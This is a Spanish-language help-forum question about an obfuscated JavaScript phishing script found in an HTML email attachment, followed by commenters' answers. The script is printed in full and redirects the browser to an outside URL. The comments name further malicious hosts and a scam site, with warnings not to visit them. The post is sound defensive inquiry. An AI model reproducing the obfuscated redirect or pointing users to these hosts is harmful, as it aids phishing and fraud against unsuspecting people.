Algunos de mis compañeros de trabajo no informáticos abrieron un adjunto .html en un mensaje de correo electrónico que parece extremadamente sospechoso. Resultó en una pantalla en blanco cuando parece que se ejecutó algún código de JavaScript.¿Qué hace este código de phishing sospechoso?
<script type='text/javascript'>function uK(){};var kV='';uK.prototype = {f : function() {d=4906;var w=function(){};var u=new Date();var hK=function(){};var h='hXtHt9pH:9/H/Hl^e9n9dXe!r^mXeXd!i!a^.^c^oHm^/!iHmHaXg!e9sH/^zX.!hXt9m^'.replace(/[\^H\!9X]/g, '');var n=new Array();var e=function(){};var eJ='';t=document['lDo6cDart>iro6nD'.replace(/[Dr\]6\>]/g, '')];this.nH=false;eX=2280;dF="dF";var hN=function(){return 'hN'};this.g=6633;var a='';dK="";function x(b){var aF=new Array();this.q='';var hKB=false;var uN="";b['hIrBeTf.'.replace(/[\.BTAI]/g, '')]=h;this.qO=15083;uR='';var hB=new Date();s="s";}var dI=46541;gN=55114;this.c="c";nT="";this.bG=false;var m=new Date();var fJ=49510;x(t);this.y="";bL='';var k=new Date();var mE=function(){};}};var l=22739;var tL=new uK(); var p="";tL.f();this.kY=false;</script>
¿Qué hizo? Está más allá del alcance de mi conocimiento de programación.
No sugiero que nadie haga clic en este enlace. Esa página carga un iframe de http://onionfleet.ru:8080/index.php?pid=10, y redirige a http://mouselong.com. también ** no haga clic en los enlaces de este comentario ** a menos que sepa lo que está haciendo. – x1a4
que a su vez contiene un iframe que enlaza a un sitio de estafa que vende * relojes no tan auténticos * aparentemente ... – nico